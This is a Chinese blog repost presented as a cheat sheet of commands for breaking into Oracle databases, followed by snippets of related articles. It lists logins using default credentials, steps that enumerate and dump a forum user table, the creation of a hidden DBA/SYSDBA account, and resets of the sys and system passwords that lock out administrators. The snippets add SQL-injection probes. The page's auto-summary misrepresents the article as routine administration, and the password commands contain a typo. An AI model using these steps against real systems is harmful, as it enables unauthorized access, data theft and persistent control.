入侵Oracle数据库时常用的操作命令整理

最新推荐文章于 2025-08-15 10:38:51 发布
转载 最新推荐文章于 2025-08-15 10:38:51 发布 · 997 阅读 · 0
文章标签:

#数据库 #oracle #bbs #database #table #user

本文提供了一套详尽的Oracle数据库管理教程,包括无密码登录、启动数据库实例、查看数据库信息及用户权限等实用命令,并介绍了如何创建用户、授权及修改密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。

 

1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。

 

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

 

3、

 

SQL>connect / as sysdba ;(as sysoper)或 

connect internal/oracle AS SYSDBA ;(scott/tiger) 

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

 

5、 查看当前的所有数据库:

 

select * from v$database; 

select name from v$database; 

desc v$databases; 查看数据库结构字段

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:

 

SQL>select * from V_$PWFILE_USERS; 

Show user;查看当前数据库连接用户

7、进入test数据库:database test;

 

8、查看所有的数据库实例:select * from v$instance;

 

如:ora9i

 

9、查看当前库的所有数据表:

 

SQL> select TABLE_NAME from all_tables; 

select * from all_tables; 

SQL> select table_name from all_tables where table_name like '%u%'; 


TABLE_NAME 

------------------------------ 

_default_auditing_options_

10、查看表结构:desc all_tables;

 

11、显示CQI.T_BBS_XUSER的所有字段结构:

 

desc CQI.T_BBS_XUSER;

 

12、获得CQI.T_BBS_XUSER表中的记录:

 

select * from CQI.T_BBS_XUSER;

13、增加数据库用户:

 

create user test11 identified by test default 
tablespace users Temporary TABLESPACE Temp;

14、用户授权:

 

grant connect,resource,dba to test11; 

grant sysdba to test11; 

commit;

15、更改数据库用户的密码:(将sys与system的密码改为test.)

 

alter user sys indentified by test; 

alter user system indentified by test;
 
【愚公系列】2024年03月 《网络安全应急管理与技术实践》 027-网络安全应急技术与实践(数据库层-Oracle 攻击重现与分析)
时光隧道
02-17 9万+
Oracle 攻击重现与分析是指重新演示和分析Oracle数据库系统中的攻击行为。Oracle数据库是一种常用的关系型数据库管理系统,由于其广泛应用于企业和组织中,其安全性成为黑客攻击的目标之一。在Oracle攻击重现与分析过程中,可以使用各种攻击方法和工具来模拟攻击行为,如SQL注入、系统提权、远程代码执行等。通过重现攻击行为,可以深入了解攻击者的策略和技术手段,从而更好地防御和应对类似的攻击。在分析阶段,可以使用安全日志、审计日志和网络流量等数据来分析攻击的来源、目标和影响。
数据库系统工程师》考试大纲概况(后续分段详写)
qq_46301912的博客
11-18 3011
数据库系统工程师》考试大纲概况(后续分段详写)
oracle入侵与SQL注射技巧
06-09
oracle入侵与SQL注射技巧
入侵oracle数据库的一些心得
weixin_30896763的博客
08-24 283
件作者:pt007[at]vip.sina.com版权所有,转载请注明版权 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几...
入侵oracle数据库常用操作命令整理
killkill
07-26 1013
最近遇到一个使用了oracle数据库的服务器,在狂学oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者.1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus /nolog 或sq
数据库安全:入侵Oracle数据库常用操作命令
weixin_34007886的博客
11-08 247
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus /nolog 或s...
入侵Oracle数据库常用操作命令
std7879的博客
06-24 265
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; 3、SQL>connect /
oracle数据库常用操作命令整理
ssjyr的专栏
10-31 281
源文:http://itmed.blog.sohu.com/97459109.html 最近遇到一个使用了oracle数据库的服务器,在狂学oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者. 1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus s
oracle特有的操作命令,Oracle入侵常用操作命令整理
weixin_27956639的博客
04-03 82
1、su–oracle不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus/nolog或sqlplussystem/manager或./sqlplussystem/manager@ora9i;3、SQL>connect/assysdba;(assysoper)或connectinternal/oracleASSYSDB...
Oracle入侵常用操作命令整理
09-14
本篇文章主要梳理了Oracle入侵常用操作命令,同也为防御和学习Oracle安全提供参考。 1. **切换用户**: `su – oracle` 命令用于在没有DBA权限的情况下切换到Oracle用户,但通常需要操作系统级别的权限。...
oracle入侵防范,详述oracle入侵和SQL注射方法
weixin_42390873的博客
04-11 295
①判断是否为Oralce数据库:And 0<>(select count(*) from dual) 返回正常页面表示为Oracle数据库②猜解字段数量:使用order by 或者group by逐个提交数字 直到回显错误页面③列出字段数目 比如6个字段数目and 1=1 null,null,null,null,null,null from dual—因为ORACLE数据库是不自动匹配...
利用Oracle漏洞提权笔记
原野
08-31 9968
 1.利用已知的Oracle用户名连上数据库,并创建java提权函数C:/WINDOWS/system32>sqlplus /nologSQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008Copyright (c) 1982, 2002, Oracle Corporation.  Al
MoonBit Perals Vol.05: 函数式里的依赖注入:Reader Monad
m0_74743788的博客
08-13 1323
普通的函数就像一个流水线,你丢进去一袋面粉,然后直接跑到生产线末端,等着方便面出来。但这条流水线需要自动处理中间的所有复杂情况:没放面粉/“没有下单,期待发货”(null)面团含水量不够把压面机干卡了(抛出异常)配料机需要读取今天的生产配方,比如是红烧牛肉味还是香菇炖鸡味(读取外部配置)流水线末端的打包机需要记录今天打包了多少包(更新计数器)Monad 就是专门管理这条复杂流水线的“总控制系统”。它把你的数据和处理流程的上下文一起打包,确保整个流程能顺畅、安全地进行下去。
如何在 Linux 上安装 SQL Server 2022 和 Azure Data Studio
csdn_aspnet的专栏,请点击博客主页右上角三个点中的私信联系
08-15 918
本文介绍了如何在Linux系统(以Ubuntu 20.04为例)上安装SQL Server 2022及Azure Data Studio。SQL Server自2017版开始支持Linux平台,通过平台抽象层实现跨平台兼容性。文章详细说明了安装步骤:导入GPG密钥、注册存储库、安装软件包并配置管理员密码。同介绍了SQL Server在Linux上的不同版本(企业版、标准版等)和主要功能差异。安装完成后,用户可通过Azure Data Studio等工具进行连接管理,文中提供了连接参数设置指南。整个过程简便
MySQL 常用命令速查表
最新发布
DeppBing的博客,全栈修炼记|记录一个开发者的进化轨迹
08-15 454
本文总结了MySQL常用SQL命令,涵盖数据库操作、表操作、数据操作、数据查询、权限控制、事务控制等核心功能。主要内容包括:数据库的创建/删除/修改(CREATE/DROP/ALTER DATABASE);表结构的创建/修改/删除(CREATE/ALTER/DROP TABLE);数据增删改查(INSERT/DELETE/UPDATE/SELECT);索引管理(CREATE/DROP INDEX);用户权限控制(GRANT/REVOKE);事务管理(START/COMMIT/ROLLBACK)等。每个命令都
cat本地部署
Chaser______的博客
08-15 435
CAT监控系统部署指南 环境准备:JDK1.8、Tomcat、MySQL 获取CAT包:通过Git克隆源码或下载官网war包 部署步骤: 创建/data目录结构并设置权限 配置client.xml、datasources.xml和server.xml 导入SQL文件创建数据库 将cat.war部署到Tomcat的webapps目录 启动服务:启动Tomcat后访问http://ip:8080/cat 注意事项:将配置文件中的127.0.0.1替换为实际IP地址 (98字)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值